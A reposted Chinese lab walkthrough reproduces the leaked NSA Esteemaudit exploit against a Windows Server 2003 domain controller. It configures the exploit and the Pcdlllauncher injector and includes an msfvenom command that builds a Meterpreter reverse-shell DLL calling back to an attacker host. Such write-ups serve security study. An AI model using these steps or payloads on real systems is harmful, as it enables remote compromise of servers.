码迷,mamicode.com
首页 > 其他好文 > 详细

ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

时间:2017-04-23 12:36:38      阅读:456      评论:0      收藏:0      [点我收藏+]

标签:方程式   key   win   net   运行   端口   word   com   origin   

没有时间测试呢,朋友们都成功复现,放上网盘地址:https://github.com/x0rz/EQGRP

近日臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers在steemit.com博客上提供了相关消息。以下是其中Esteemaudit漏洞复现过程。

前期准备

IP系统信息用途备注
192.168.146.132 Windows xp 攻击机 需安python2.6.6&pywin32
192.168.146.129 kali 2.0 用于生成攻击payload(反弹shell等)和控制反弹的shell会话 生成reverse shell 的dll
192.168.146.136 Windows Server 2003 靶机 域控环境

靶机环境

技术分享

需要域控环境

Esteemaudit漏洞复现过程

use Esteemaudit使用漏洞模块

技术分享

设置目标IP和端口

技术分享

然后基本上默认,基本配置如下:

技术分享

运行后再进行配置。

 技术分享

然后基本上选择相对应的设置,CallbackIp填自己的,端口随便

技术分享

然后配置DLL。注意这里默认路径基本上是不对,找到自己对应的文件路径进行修改:

 技术分享

然后基本上配置如下

技术分享

可以运行了

 技术分享

利用Pcdlllauncher注入DLL

使用Pcdlllauncher

use Pcdlllauncher

技术分享

然后生成用于反弹shell的dll payload:

 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.146.129 LPORT=4444 -f dll >win.dll

技术分享

然后进行配置

找到自己对应的文件路径修改

 

技术分享

 

要注入的恶意DLL文件路径

技术分享

然后基本上默认,运行就行了,成功注入

查看Metasploit,成功返回shell

技术分享

*本文作者:zusheng,转载请注明来自FreeBuf.COM

ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

标签:方程式   key   win   net   运行   端口   word   com   origin   

原文地址:http://www.cnblogs.com/REscan/p/6752083.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!